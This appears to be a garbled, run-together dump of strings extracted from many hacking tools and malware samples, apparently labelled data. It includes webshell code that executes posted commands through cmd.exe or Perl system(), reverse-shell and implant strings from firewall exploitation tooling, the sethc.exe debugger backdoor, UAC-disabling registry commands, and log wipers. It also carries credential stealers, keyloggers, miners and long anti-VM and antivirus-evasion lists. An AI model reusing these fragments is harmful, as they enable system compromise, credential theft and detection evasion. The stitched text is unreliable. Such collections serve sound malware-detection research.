\",out=sys.stdout):print >>out, \"%s%04x \" % (lead,i),print >>out, \"%02x\" % ord(x[i+j]),print >>out, sane(x[i:i+16])components/modules/biosmodule/implant/e28f6/../e28f640j3_asm.scmosreadbytechecksumareaconfirmed.0writespeedplow.c--cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s --lptimeout %u%s -c <cmdtype> -l <lp> -i <implant> -k <ikey> -s <port> -d <port> [operation] [options]* [%lu] 0x%x is marked as stateless (the module will be persisted without its configuration)%s version %s already has persistence installed. if you want to uninstall,the active module(s) on the target are not meant to be persistedlp.c:pixsecurity - improper number of bytes read in security/interface informationlp.c:pixsecurity - not in sessiongetmodinterface__preloadedmodulesshowcommandsreadmoduleinterfacewrapping_not_necessary_or_wrapping_okget_cmd_listlp_listen2killcmdlistmodule and implant versions do not match. this module is not compatible with the target implant%s/bf_read_%08x_%04d%02d%02d_%02d%02d%02d.log%s/bf_%04d%02d%02d.log%s/bf_read_%08x_%04d%02d%02d_%02d%02d%02d.bin* not attempting to execute \"%s\" commandterminating script (command error or \"quit\" encountered)execute code in <file> passing <argx> (hex)* use arrow keys to scroll through command historypitcmd_processcmdlineexecute all commands in <file>__processshellcmdpittarget_getdstport__processsettargetiplogging commands and output - onthis command is too dangerous. if you'd like to run it, contact the development teamimplant version-specific values:this function should not be used with a netscreen, something has gone horribly wrongcreatesendrecv: recv'd an error from the target.error: watchdogtimeout read returned %d instead of 4command has not yet been codedbeacon domain : www.%s.comthis command can only be run on a pix/asawarning! bad or missing flash values (in section 2 of .dat file)printing the interface info and security levels. pix only.incomplete and must be removed manually.)%s: recv'd an error from the target.unable to fetch the address to the get_uptime_secs function for this os versionupload/activate/de-activate/remove/cmd function faileddo you wish to activate the implant that is already on the firewall? (y/n): there is no implant present on the firewall.implant version :%lx%lx%lxyou may now connect to the implant using the pbd idkeyno reply from persistant back door.rm -rf pbd.wc; wc -c %s > pbd.wcpbd_getversionpbd/pbdencrypt.binpbd/pbdgetversion.pktpbd/pbdstartwrite.binpbd/pbd_setnewhookpt.pktpbd/pbd_upload_singlepkt.pktunable to fetch hook and jmp addresses for this os versioncould not get hook and jump addressesenter the name of a clean implant binary (not an image):unable to read dat file for os version 0x%08lxinvalid implant fileprint \"[+] connecting to %s:%s\" % (self.params.dst['ip'], self.params.dst['port'])@overridable(\"must be overriden if the target will be touched. base implementation should not be called.\")@overridable(\"must be overriden. base implementation should not be called.\")exp.load_vinfo()if not okay and self.terminateflingonexception:print \"[-] keyboard interrupt before response received\"if self.terminateflingonexception:print 'debug info ','='*40modules persistence file written successfullymodules persistence data successfully removedno modules are active on the firewall, nothing to persisterror while attemping to persist modules:error while reading interface info from pixlp.c:pixfree - failed to get responsewarning: lp timeout specified (%lu seconds) less than default (%u seconds). setting defaultunable to fetch config address for this os versionlp.c: interface information not available for this session[%s:%s:%d] error: extract_fgbgwarning: session may not have been closed!exec packet processedfailed to insert the command into command list.send_packet: trying to send too much data.payloadlength >= max_allow_size.wrong payload sizeunknown packet received......returned eax = %08xlogging.error(\" perhaps you should run with --scan?\")logging.error(\"error: no entry for etag [%s] in %s.\" %\"be supplied\")received prompt, we're infailed to login, bad creds, abortsending command \" + str(n) + \"/\" + str(tot) + \", len \" + str(len(chunk) + received nat - epba: ok, payload: mangled, did not runno status returned from target, could be an exploit failure, or this is a version where we don't expect a stus returnreceived arp - epba: ok, payload: failchopped = string.rstrip(payload, \"\\x0a\")shstrtab
1 /x86/bypassuac.exe/x64/bypassuac.exe/x86/bypassuacdll.dll/x64/bypassuacdll.dllafx_idp_command_failurew
1 trm_hookcallback(non-win32 .exe or error in .exe image).pass hacker@hacker.com/scripts/..%c1%1c../winnt/system32/cmd.exemail from:hacker@hacker.comhttp://isno.yeah.netset serviceobj = getobject(\"winnt://\" & objnet.computername & \"/w3svc\")wscript.echo \"usage:killlog.vbs logfilename yourip.\"set txtstreamout = fso.opentextfile(destfile, forwriting, true)set objnet = wscript.createobject( \"wscript.network\" )set fso = createobject(\"scripting.filesystemobject\")2tinject.dllwindows servicesfindrst6press any key to continue......if not exist %1\\rshsetup.exe goto error2echo rshsetup.exe is not found in the %1 directoryrem %1 directory must have rshsetup.exe,rshsvc.exe and rshsvc.dllcopy %1\\rshsvc.exeecho use \"net start rshsvc\" to start the service.rshsetup %systemroot%\\system32\\rshsvc.exe %systemroot%\\system32\\rshsvc.dllpushd %systemroot%\\system32newgina.dllwlxactivateusershellwlxwkstalockedsaswlxislockokwlxshutdown\\scanner.ini\\scanner.exe\\scanner.lst\\hensss.lsts
1 %sspyagent password has been successfully changed.error: you need to set your spyagent password before proceeding.click the \"set password\" button in the \"options\" dialog to set your password!spyagent keystrokes log viewerc:\\source\\spyagent7\\release\\autoi.pdb.
1 press any keenter 1 obon >0 & <65535l--choose versionexa only runtuzemcpysetprintf\\wsftartupresponse.write \"command completed success!\" for each co in foditems <input type=text name=text6 value=\"<%= szcmd6 %>\"><br> <title>hello! welcome </title>%s -install -->to install the service%s -start -->to start the service%s -stop -->to stop the servicethe port is out of rangefail to set the port\\psapi.dlltinject.dllsoftware\\microsoft\\internet explorer\\wineggdropshellinjectt.exesniffer.dll:execute net.exe user administrator passfport.exe or mport.exe :password sniffering is running |not running : the terminal service port has been set to newport: del www.exe :dir *.exe param = \"driver={microsoft access driver (*.mdb)}\" conn.open param & \";dbq=\" & server.mappath(\"scjh.mdb\") set rs=conn.execute (sql)%> <%set conn = server.createobject(\"adodb.connection\") <%dim ktdh,scph,scts,jhqtsj,yhxdsj,yxj,rwbh sql=\"select * from scjh\" e
1 xyzcmd v1.0 for nt s= click here if you want to get your registered copy of aspack; for beginning of translate - copy english.ini into the yourlanguage.inie-mail: shinlan@km169.net; please, translate text only after simbol '='= compress with aspackresponse.write \"<a href='index.asp'>if request.cookies(\"password\")=\"whichdir=server.mappath(request(\"path\"))set fs = createobject(\"scripting.filesystemobject\")whichdir=request(\"path\")hit [enter] to begin command mode...if you are in command mode,[/l] lists all the drives the monitor is currently attached tof
1 passwordchangenotifyvplrxzhtudog2j~ldqpqftk(wou\"isztk)startthreadatwinlogon<
1 00-00-00-00-00-00c:\\users\\ziedpirate.ziedpirate-pc\\desktop\\sop\\sop\\release\\(separate usernames with a comma, or leave blank to monitor all uses.)input usernames here and separate with a comma. leave blank to monitor all users.please enter access password: delivery via email and ftp3
1 updatemutex:response=scanin:update_bunistall_bs_protectp_walletgr_commandftpupload-ip2-post1-post2-udplogin=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]-timeout-thread local; ru) presto/2.10.289 version/-icmp<xmp>-long99=1x5o!p%@ap[4\\pzx54(p^)7cc)7}$eicar-standard-antivirus-test-file!$h+h*nullsoft
1 vb5chs.dllmsvbvm50.dllsystem.dllset sys=server.createobject (\"system.contral\") public function reboot(atype as variant)t& = exitwindowsex(1, atype)atype=request(\"atype\") aceivex dlldeclare function exitwindowsex lib \"user32\" (byval uflags as long, byval sys.reboot(atype)' -- check for a command that we have posted -- 'sztempfile = \"c:\\\" & ofilesys.gettempname( )<meta http-equiv=\"content-type\" content=\"text/html; charset=gb2312\"><body><input type=text name=\".cmd\" size=45 value=\"<%= szcmd %>\">call oscript.run (\"cmd.exe /c \" & szcmd & \" > \" & sztempfile, 0, true)szcmd = request.form(\".cmd\")%s server.exeservice port: %sthe port must been >0 & <655353--set server portthe server password exceeds 32 charactersservice name: %sserver password: %sinject process name: %swineggdrop shell congiratorerror get globalgroup memebers: nerr_invalidcomputererror get users from server!get in nt by name and nullget something from nt, hold by killusa.logon.exedomain and user:pid=get addr$(): onepsapi.dllkt
1 usage: %s [-h] [-v] [-t target] [-u username] [-p password][assuming one session already existed or target is null.]heapalloc() failed for ansiservererror : fail to enumerate current sessionerror : fail to get session datafail to search lsass datakerberos.dlllivessp.dllwdigest.dlltspkg.dlllsasrv.dlltmp.dat?getmsgproc@@ygjhij@zishkmsjetodb.dll
1 enablelua /t reg_dword /d 0 /f*a01**a02**a03**a04**a05**a06*hostsettingssevane.tmpcmd_.bata2b7c3d7e4cmd.dlldefpathhknamehportipathpanelpathrooturlvirusscanpronoipstreamwebcamdomain_passwordstub.form1.resourcesf
1 30.40.50.60:9342|###[ snmpresponse ]###[+] generating exploit for exec mode pass-disable[+] building payload for mode pass-disable[+] executing: extrabaconappended aaaadminauth_enable payload/bananaglee/eligiblebombprotocol must be either http or https (ex: https://1.2.3.4:1234)
1 saveselectedfiltercmdexecutepasswordchar@wsockhook.dllpsinitialsystemprocess @%ppslookupprocessbyprocessid(%u) failedpslookupprocessbyprocessid(%u) => %pfirststage() loaded, currentthread @%p stack %p - %pdic\\loginlist.txtradmin.exelamescan3.pdf!dic\\passlist.txtqy001service/.mikyc
1 restart with the new protocol, address, and port as target.targetport : %s (%u)error: strchr() could not find '@' in account name.targetacctpwd : %screating curl connection handle...[+] setting password : (null)[-] tbbuffcpy() failed![+] smb negotiation12345678-1234-abcd-ef00-0123456789abvalue must end with 0000 (2 nulls)[*] configuring payload[*] connecting to listener
1 n:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t;<<t;<<t;<<t;<<t;<<t;<<t;<<t;<<t<<<t;<<t;<<t;<<t;<<t;<<t<<<t<<>>><<<c/a/a/b/a/main/start.classcon g/con g.perljava/textito.isnmain.classpkplugins/server.classpkidpkconfig.inipkpassword.inipkloadstub.classpkloadstubdecrypted.classpkloadpassword.classpkdecryptstub.classpkclassloaders.classpkutil/oshelperalienspyconfig.xmlpkkey.classpksvd$1.classpksvd$2.classpkmensaje.classpkinic$shutdownhook.classuninstall.jarpkresources/icono.pngpkbss_serverclick_delay
1 c:\\windows\\system32\\command.com /c easy usage version -- edited by: racle@tian6.comoh,sry.too long command.success! commander.hey,how can racle work without ur command ?the exploit thread was unable to map the virtual 8086 address space[+] usage: vnc_bypauth <target> <scantype> <option>========realvnc <= 4.1.1 bypass authentication scanner=======[+] type vnc_bypauth <target>,<scantype> or <option> for more informationsvnc_bypauth -i 192.168.0.1,192.168.0.2,192.168.0.3,...-vn:%-15s:%-7d connection closedprogram termingwww.icehack.yoda & m.o.d.-> come.to/f2f **************c:\\temp\\$530 please login with user and pass._shell.exeftpcwaitingpassword@members.3322.net/dyndns/update?system=dyndns&hostname=http://www.xxx.com/xxx.exe@ddns.oray.com/ph/update?hostname=listviewprocesslistcolumnclick!http://iframe.ip138.com/ic.aspusage : ms11-080.exe cmd.exe command \\ms11080\\ms11080\\debug\\ms11080.pdb[>] by:mer4en7y@90sec.org[>] create porcess error[>] ms11-080 exploitusage:system_exp.exe \"cmd\"the shell \"cmd\" success!not windows nt family os.unable to get kernel base address.run \"%s\" failed,code: %dwindows kernel local privilege exploit h
1 http/1.0mozilla/5.0 (windows; u; windows nt 5.1; en-us; rv:1.8.0.6) gecko/20060728 firefox/1.5.0.6callback[0]callback[1]callback[2]callback[3]callback[4]mtbtr-dwevckpba.dat+rrror oogin as %sid=%s,oemcp=%d,acp=%d002 termsrv=%d002 inject=%s002 sleep=%d002 cbm=%d002 callback[4]=%s002 callback[3]=%s002 callback[2]=%s002 callback[1]=%s002 callback[0]=%s002 ramfree=%dmb002 ram=%dmb002 cpu=%s002 ipaddress=%s002 password=%s002 time=%s002 oemcp=%d002 os=%s002 group=%d002 image=%d002 name=%s002 nick=%s002 version=%s002 id=%sstartdocazwunmapviewofsectionntunmapviewofsection<%execute request
1 enter your own password here
1 probe #2 usage: %s -i targetip -p targetport -r %d [-o timeout] -t protocol -n imailusername -a imailpassword** runexploit ** - exception_execute_handler : 0x%08xsending implant payload.. cencimplantpayload size(%d)target is not vulnerable** createpayload ** - exception_execute_handlerskip call to packageridearea(). payload has already been packaged. options -x and -q ignored.error: pgvars->pintrideareaimplantpayload is nulldec pathworks tcpip service on windows nt<\\\\__msbrowse__> g<irisnameserver>** sendandreceive ** - exception_execute_handlerbinding to rpc interface %s over named pipeerror: tbmalloc() failed for encoded exploit payload** encodeexploitpayload ** - exception_execute_handlersending implant payload (%d-bytes)error: encoder failed on exploit payloaderror: vulnerableos() != ret_successerror: connection terminated by target (tcp ack/fin)target did not respond within specified amount of time# scan for windows boxesgoing into send# does not workyou are the weakest link, goodbyerpc scan for rpc folksp
1 ati.jo840112-cras8468-11150923-pci8273vprincpespr!ncpeshastati\\temp\\~v3.logbrowser password recovery reportbrowserpassworddecryptorwww.securityxploded.comc:\\users\\bernardino\\appdata\\roaming\\berna@consultoreslegales.com.mx (1).pstmail password recovery reportmailpassworddecryptorc:\\users\\apant\\documents\\programdata\\abacus.ostc
1 ven_vmware_prod_vmware_virtual_hgfs.sysmhgfs.sysprleth.sysprlfs.sysprlmouse.sysprlvideo.sysprl_pv32.sysvpc-s3.sysvmsrvc.sysvmx86.sysvmnet.sysvmicheartbeatvmicvssvmicshutdownvmicexchangevmdebugvmmousevmtoolsvmmemctlvmwarevpcbusvpcuhubmsvmmoufxenevtchnxennetxennet6xensvcxenvdbxenvmmvboxhook.dllvboxservicevboxtrayvboxmousevboxguestvboxsfvboxguestadditionsvbox harddisk00-05-6900:05:6900056900-50-5600:50:5600505600-0c-2900:0c:29000c2900-1c-1400:1c:14001c1408-00-2708:00:27080027\\\\.\\physicaldrive0sandbox\\sample\\virusmaltesttequilaboomboommalwareollydbgwindbgframeclassselect description from win32_videocontrollerselect * from win32_videocontrollervirtualbox graphics adaptervmware svga iivm additions s3 trio32/64parallelremotefxcirrus logicmatroxkernel32.dllisdebuggerpresentcontinuedebugeventprocexp.exeprocmon.exeprocessmonitor.exewireshark.exefiddler.exewindbg.exeollydbg.exewinhex.exeprocesshacker.exehiew32.exe\\\\.\\ntice\\\\.\\sice\\\\.\\syser\\\\.\\syserboot\\\\.\\syserdbgmsgsoftware\\microsoft\\windows\\currentversionregqueryvalue55274-640-2673064-2395076487-337-8429955-2261476487-640-1457236-23837sbiedll.dll76487-644-3177037-23510vboxservice.exevmware.exevmware-authd.exevmware-hostd.exevmware-tray.exevmware-vmx.exevmnetdhcp.exevpxclient.exehardware\\description\\systemhardware\\description\\system\\biossystemmanufacturersoftware\\microsoft\\windows\\currentversion\\policies\\explorer\\disallowrunsoftware\\microsoft\\windows\\currentversion\\uninstall\\software\\policies\\microsoft\\windows defenderantivirusdisablenotifydontreportinfectioninformationdisableantispywareruninvalidsignaturesantivirusoverridecheckexesignaturesblackd.exeblackice.exelockdown.exelockdown2000.exetaskkill.exetskill.exesmc.exesniffem.exezapro.exezlclient.exezonealarm.exesoftware\\microsoft\\security centeruacdisablenotifysystem\\currentcontrolset\\services\\sharedaccess\\parameters\\firewallpolicyenablefirewallfirewalldisablenotifynetsh firewall add allowedprogramsoftware\\microsoft\\windows\\currentversion\\policies\\systemdisableregistrytoolsdisableregeditenableexecuteprotectionsupportntsetinformationprocessvirtualproctectexsetprocessdeppolicyzwprotectvirtualmemorydisabletaskmgrvirtualallocexntwritevirtualmemorywriteprocessmemorycreateremotethreadcreatethreadshell32.dllwinexecsoftware\\microsoft\\windows\\currentversion\\runsoftware\\microsoft\\windows\\currentversion\\runoncesoftware\\microsoft\\windows\\currentversion\\runservicessoftware\\microsoft\\windows\\currentversion\\runservicesoncesoftware\\microsoft\\windows nt\\currentversion\\winlogonsoftware\\microsoft\\windows\\currentversion\\policies\\explorer\\runsoftware\\microsoft\\windowsnt\\currentversion\\windowssoftware\\microsoft\\windows\\currentversion\\explorer\\sharedtaskschedulercomfile\\shell\\open\\commandpiffile\\shell\\open\\commandexefile\\shell\\open\\commandtxtfile\\shell\\open\\commandwin.inisystem.inistart menu\\programs\\startupsoftware\\classes\\protocols\\handlersoftware\\classes\\protocols\\filtermicrosoft\\windows\\currentversion\\internet settings\\proxyserversoftware\\microsoft\\windows\\currentversion\\internet settings\\proxyenabledrivers\\etc\\hostsadvapi32.dllcontrolservicequeryservicestatusdllcanunloadnowdllinstalldllregisterserverdllunregisterserverws2_32.dllsystem.netwsock32.dllwsastartupsendtorecvfromwsasendtowsarecvfromudpclientmswsock.dllacceptgetacceptexsockaddrswsaacceptwsasockettcplisteneraccepttcpclient.no-ip.org.publicvm.com.linkpc.net.dynu.com.dynu.net.afraid.org.chickenkiller.com.crabdance.com.ignorelist.com.jumpingcrab.com.moo.com.strangled.com.twillightparadox.com.us.to.strangled.net.info.tm.homenet.org.biz.tm.continent.kz.ax.lt.system-ns.com.adultdns.com.craftx.biz.ddns01.com.dns53.biz.dnsapi.info.dnsd.info.dnsdynamic.com.dnsdynamic.net.dnsget.org.fe100.net.flashserv.net.ftp21.netfirewallapi.dll\\currentcontrolset\\services\\tcpip6\\parameters\\interfaces\\system.net.mailsmtpclientmail from:rcpt to:cdo.messagecdosmtpservercdosendusingmethodcdoex.dll/cdo/configuration/smtpserverpeercollabexportcontactpeercollabgetapplicationregistrationinfopeercollabgetendpointnamepeercollabgeteventdatapeercollabgetinvitationresponsepeercollabgetpresenceinfopeercollabgetsigninoptionspeercollabinvitecontactpeercollabinviteendpointpeercollabparsecontactpeercollabquerycontactdatapeercollabrefreshendpointdatapeercollabregisterapplicationpeercollabregistereventpeercollabsetendpointnamepeercollabsetobjectpeercollabsetpresenceinfopeercollabsignoutpeercollabunregisterapplicationpeercollabupdatecontacttor\\hidden_service\\private_keytor\\hidden_service\\hostnametor\\locktor\\statenickpingjoinuserprivmsgwininet.dllinternetopenurlinternetwritefileidhttpheaderinfourlmon.dllurldownloadtocachefileurlopenstreamurlopenpullstreamftpgetcurrentdirectoryftpgetfileftpputfileftpsetcurrentdirectoryftpopenfileftpgetfilesizeftpdeletefileftpcreatedirectoryftpremovedirectoryftprenamefileftpdownloadftpuploadftpgetdirectorysocketwsaconnectclosesocketwsacleanupdnsapi.dllgethostentrygetaddrinfogethostbynamewsaasyncgethostbynamednsqueryssleay32.dlllibeay32.dlllibssl32.dllidsslopensslcrypt32.dllsystemtimetofiletimegetsystemtimegetsystemtimeasfiletimecryptcreatehashcryptacquirecontextcrypthashdataopencl.dllnvcuda.dllopengl32.dllcpuminer 2.2.2x-mining-extensionscpuminer 2.2.3x-mining-extensionsufasoft bitcoin-miner/0.20stratumsoftware\\microsoft\\systemcertificates\\spc\\certificatescertopensystemstoreadjusttokenprivilegesgdi32.dlluser32.dllbitbltgetdccheckip.dyndns.orgwhatismyip.orgwhatsmyipaddress.comgetmyip.orggetmyip.co.uksoftware\\vitalwerks\\ducj.maxmind.comgetasynckeystategetkeystatemapvirtualkeygetkeyboardtypesamiconnectsamigetprivatedatasamqueryinformationusecredenumerateacredenumeratewsoftware\\microsoft\\internet account managersoftware\\microsoft\\identitycrl\\credssecurity\\policy\\secretswinmm.dllwaveinstartwaveinresetwaveinaddbufferwaveinopenwaveinclosesignons.sqlitesignons3.txtsecmod.dbcert8.dbkey3.dbvncpassviewabe2869f-9b47-4cd9-a358-c22904dba7f7packet.dllnpf.syswpcap.dllwinpcap.dllopenthreadqueueuserapcautorun.infdesktop.inidesktop.lnknetapi32.dllnetsharegetinfonetshareenumultravnc.inistartvncstopvncsystem\\currentcontrolset\\control\\terminal serversoftware\\microsoft\\windows nt\\currentversion\\terminal serversystem\\currentcontrolset\\control\\terminal server\\winstations\\rdp-tcpenableadmintsremotenet start termservicesc config termservice startsoftware\\microsoft\\telnetserveravicap32.dllcapcreatecapturewindowsoftware\\microsoft\\windows nt\\currentversion\\hotfixcreatemutexadvapi32.dllregqueryvalueexaregopenkeyexaregcreatekeyaduplicatetokenexopenprocesstokenlookupprivilegevalueakernel32.dllgetprivateprofileintagetprivateprofilestringawriteprivateprofilestringadeletefileacreatefileafindfirstfileamovefileexafindcloseuser32.dllunhookwindowshookexsetwindowshookexacallnexthookexsoftware\\\\oracle\\\\virtualbox guest additionsvmmouse.sysvmware virtual ide hard drivesystem\\controlset001\\services\\disk\\enumsystem\\\\controlset001\\\\services\\\\disk\\\\enumvmhgfs.sysvmcivmtoolsvmware2vmount2vmusrvcvboxservicevboxtrayxenservice
1 pass->logon successful250 requested file action okay, completed.m
1 \x00cmd.exe\x00\x00sethc.exe\x00\x00debugger\x00\x00software\\microsoft\\windows nt\\currentversion\\image file execution options\x00set xpost = createobject(s1):xpost.open \"get\",iremote,0:xpost.send()set sget = createobject(s2):sget.mode=3:sget.type=1:sget.open()wsh.echo \"rcmd v1.01 by netpatch\"wsh.echo \"read.vbs created!!!\"wsh.echo \"cscript \"&wscript.scriptfullname&\" targetip username password commandauthentication id:authentication package:authentication domain:primary user:* user: * domain: * password: -slave-listenwating on port %d...\x0aend waiting2\x0a
1 $%!aaaaaa1|aaaaaa2|aaaaaa3|aaaaaa4|aaaaaa5|%s%d.exeastalavistagivemecache%s\\system32\\drivers\\blogs\\*bndk13merandom-number-hereconfig.txta/a/a/a/f.classa/a/a/a/l.classa/a/a/b/q.classa/a/a/b/v.classmachinedetailsmysettingssendftppasswordssendbrowserpasswordsarma2keymasskeylogger
1 invalid password hash: %s-= mysql hash cracker =- usage: %s hashhash: %08lx%08lxfound pass: pass not foundt
1 \\release\\bypassuacdllw
1 ersingscandelete-tcbtime-wait1last-aclosing!fin!syn-receiv%cget %s 's password error!software\\microsoft\\active setup\\installed components\\{e3df6b419d1f}<start application 2 key><start application 1 key><select media key><start mail key><play/pause media key>0
1 s.failed_logins \"failed login attempts\", select role, password_required from sys.dba_roles order by roleselect spid 'spid', status 'status', db_name (dbid) 'database', loginame 'login'bcp.exe <:schema:>.<:table:> out \"<:file:>\" -n -s <:server:> -u <:user:> -p <:l.login_policy_name as \"login policy\", mailto:support@sqldbx.coms.last_login_time \"last login\", [ ] resolving pslookupprocessbyprocessidthe target is most likely patched.dojibiron by ronald huizer, (c) master@h4cker.us .[ ] creating evil window%shandlef_indestroy[+] set to %d exploit half succeeded/churraskito/-->usage: churraskito.exe \"command\" fuck,can't find wmi process pid./churraskito/-->found token %s wmiprvse.exeselect * from iiswebinfoip - %d; login - %d; password - %d; combination - %dip - 0; login - 0; password - 0; combination - 0create %d ip@loginl;passwordubrute.comhttp://210.73.64.88/doorway/cgi-bin/getclientip.asp?ip=n
1 @stego:syswrite(stdout, \"content-type: text/html\\r\\n\\r\\n\", 27);s/%20/ /ig;syswrite(stdout, \"\\r\\n</pre></html>\\r\\n\", 17);open(stderr, \">&stdout\") || die \"can't redirect stderr\";$_ = $env{query_string};$execthis = $_;system($execthis);s/%2f/\\//ig;<form action=\"changepwd.asp\" method=\"post\"> set ouser = getobject(\"winnt://computername/\" & username) value=\"<%=request.servervariables(\"login_user\")%>\"> windows 2000 oldpwd = request.form(\"oldpwd\") newpwd2 = request.form(\"newpwd2\") newpwd1 = request.form(\"newpwd1\") made to port 80 of the remote machine at 192.168.1.101 with theunable to resolve hostname \"%s\"source port for that outbound connection being set to 53 also. -s - outbound source port numberattempting to connect to %s port %dusage: concon \\\\ip\\sharename\\con\\conexitcode = oshell.run(\"c:\\winnt\\system32\\regsvr32.exe /u/s \" & strfile, 0, oshell.run \"c:\\winnt\\system32\\regsvr32.exe /u/s \" & strfile, 0, falseechob(\"regsvr32.exe exitcode = \" & exitcode)public property get ofs()cleanip - specify ip address which you want clear.logfile - specify log file which you want process.cleaniislog vermsftpsvcfatal error: mfc initialization failedspecified \"all\" will process all log files.specified \".\" will clean all ip record.service %s stopped.process log file %s...power by eyas<cooleyas@21cn.com>\\ipc$ \"\" /user:\"\"sqlcheck can only scan a class b network. try again.example: sqlcheck 192.168.0.1 192.168.0.254usage: sqlcheck <startip> <endip>runasex by assassin 2000. all rights reserved. http://www.netxeyes.comnote: this program can'nt run with local machine.%s execute succussifully.usage: runasex <username> <password> <execute file> [\"execute option\"]creation of results file - \"%s\" failed.c:\\>nbtdump remote-machinecerberus nbtdump<center><h1>cerberus internet scanner</h1><
1 are you alert enough to be using nmap? have some coffee or jolt(tm).shinysoft limited1shinysoft limited0wellington1wainuiomata156 wright st1utn-userfirst-objectnew zealand1failed to get temp file for source aes decryptionfailed to get encryption header for pwd-protectfailed to get filetimefailed to delete temp file for password decoding (3)<iconfile>c:\\windows\\app.ico</iconfile>failed to read the entire file<versioncreatedby>14.4.0</versioncreatedby><progresscaption>run &quot;executor.bat&quot; once the shell has spawned.</prunning zip pipeline...<fintitle /><autotemp>0</autotemp><defaultdir>%temp%</defaultdir>aes encrypting...<unzipdir>%temp%</unzipdir>/bypassuac/bypassuac/bypassuac_utils.cpp/bypassuac/bypassuacdll/bypassuacdll.aps/bypassuac/bypassuac/bypassuac.icob
1 elfstatus: ok--scryptstratum+tcp://cmd.so/challengecpu modelpassword is wrongpassword:uthentication failedecho -n -e elan2elan3chmod: not foundcat /proc/cpuinfo/proc/%s/cmdlinekill %sedit_server
1 decodeproductkeystarthttpfloodcodekeymessageboxgetfilezillapasswordsdatainudpzsocketsr
1 xsiff.exe -pass -hide -log pass.loghost: %s user: %s, pass: %sxsiff.exe -tcp -udp -asc -addr 192.168.1.1code by glacier <glacier@xfocus.org>%-5s%s->%s bytes=%d ttl=%d type: %d,%d id=%d seq=%dr
1 ongetpasswordphttp://www.chinesehack.org/global\\ps%08xstrstrastrtointanessus_get_socket_from_connection: fd <%d> is closed[*] \"%s\" completed, %d/%d/%d/%d:%d:%d - %d/%d/%d/%d:%d:%da fssniffer backdoor seems to be running on this port%s/churrasco/-->usage: churrasco.exe \"command to run\"/churrasco/-->done, command should have ran as system!mzkernel32.dllupackbydwing@e-mail : admin@luocong.comhomepage: http://www.luocong.com: %d - ustrreffix.dllultra string reference plugin v%d.%02dxscanlib.dllports/%s/%ddefault-tcp-portplugchecktcpportidttool.sysi
1 getsystemdirectorygetwindowsdirectoryisbadreadptrisbadwriteptrurldownloadtofile{\\field{\\*\\fldinst { includepicture.php?id=\\\\* mergeformat \\\\d}}{\\fldrslt}}userformuserloginforminvalid username or passwordpostupload_
1 proxy info is %s %s %s %sdomian: %s, port: %s, test domain: %sproxy num: %d, proxy ip: %s, proxy port: %s, proxy user: %s, proxy pass: %sencode domain: %s
1 %s -mutex %s -host %s -index %d -config \"%s\"www.target.com%s\\scripts\\desc\\%s.desc%c active/maximum host thread: %d/%d, current/maximum thread: %d/%d, time(s): %l%s -f hosts.txt -port -ipc -pop -max 300,20 -time 10000%s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,20%s -h www.target.com -all.\\report\\%s-%s.html.\\log\\hscan.log[%s]: found cisco enable password: %s !!!%s@ftpscan#ftp account: %s/[null].\\conf\\mysql_pass.dictry the first %d time-->build&&change by p r
1 setx tor_control_passwordmitmproxy0\\insert_cert.exeelevator.dllfail adding certdownloadingfilefail adding cert: %sinternetopena failc:\\\\windows\\\\sysnative\\\\ntoskrnl.exe[*] traversing processes_getkprocess[*] loaderconfig %ploader.objmozilla/4.0 (compatible; msie 7.0; windows nt 6.1; wow64; trident/5.0; slcc2; .net clr 2.0.50727; .net clr 3.5.30729; .net clr 3[*] token restoreelevator.obj_getexportthe file uploaded failed !the file downloaded failed !common.aspxweber_server.exed:\\hellsing\\release\\msger\\d:\\hellsing\\sys\\xrat\\d:\\hellsing\\release\\exe\\d:\\hellsing\\sys\\xkat\\e:\\hellsing\\release\\claree:\\hellsing\\release\\irene\\d:\\hellsing\\sys\\irene\\msger_server.dllcmd.exe /c ping 127.0.0.1 -n 5&cmd.exe /c del /a /f \"%s\"xweber_install_uac.exes
1 [attempt-error] target %s - login \"%s\" - pass \"%s\" - child %d - %lu of %lu(description=(connect_data=(cid=(program=))(command=reload)(password=%s)(servicecn=^user^,cn=users,dc=foo,dc=bar,dc=com for domain foo.bar.commyblog:http://hi.baidu.com/0x24quser_namefromwwhered
1 ' *** written by tim medin <tim@counterhack.com>response.binarywrite(stream.read)response.write(response.status & request.servervariables(\"remote_addr\"))%><a href=\"<%=request.servervariables(\"url\")%>\">web root</a><br/><%set folder = fso.getfolder(path)set file = fso.getfile(filepath)if ($_server[\"remote_addr\"] == $ip)header(\"http/1.0 404 not found\");<?php echo exec('killall nc');?><title>laudanum kill nc</title>foreach ($allowedips as $ip) {<form action=\"shell.asp\" method=\"post\" name=\"shell\">%comspec% /c dirset objcmd = wshell.exec(cmd)server.scripttimeout = 180cmd = request.form(\"cmd\")' *** http://laudanum.secureideas.netdim wshell, intreturn, strpresultport: <input name=\"port\" type=\"text\" value=\"8888\"><li>reverse shell - <li><a href=\"<?php echo plugins_url('file.php', __file__);?>\">file browser</a>'response.write \"<br/> -value:\" & request.querystring(key)(j)q = q & \"&\" & key & \"=\" & request.querystring(key)(j)for each i in split(http.getallresponseheaders, vblf)'urlquery = mid(urltemp, instr(urltemp, \"?\") + 1)s = urlscheme & urlhost & urlport & urlpathset http = server.createobject(\"microsoft.xmlhttp\")executable: <input type=\"text\" name=\"cmd\" value=\"cmd.exe\"><br><cfif ( #suppliedcode# neq secretcode )><cfif isdefined(\"form.cmd\")>remoteip = httpcontext.current.request.headers[\"x-forwarded-for\"].split(newremoteip = request.userhostaddress;<form method=\"post\" name=\"shell\"><body onload=\"document.shell.c.focus()\">command_hist[current_line] = document.shell.command.value;if (e.keycode == 38 && current_line < command_hist.length-1) {array_unshift($_session['history'], $command);if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {$process = proc_open($shell, $descriptorspec, $pipes);printit(\"successfully opened reverse shell to $ip:$port\");$input = fread($pipes[1], $chunk_size);$query = isset($_post['query']) ? $_post['query'] : '';$result = dns_get_record($query, $types[$type], $authns, $addtl);foreach (array_keys($types) as $t) {<servlet-name>command</servlet-name><jsp-file>/cmd.jsp</jsp-file>cmd.jsp}cmd.jsppkweb-inf/web.xmlweb-inf/web.xmlpkpublic function __activate()register_activation_hook(__file__, array('wp_laudanum', 'activate'));$allowedips =<a href=\"<?php echo 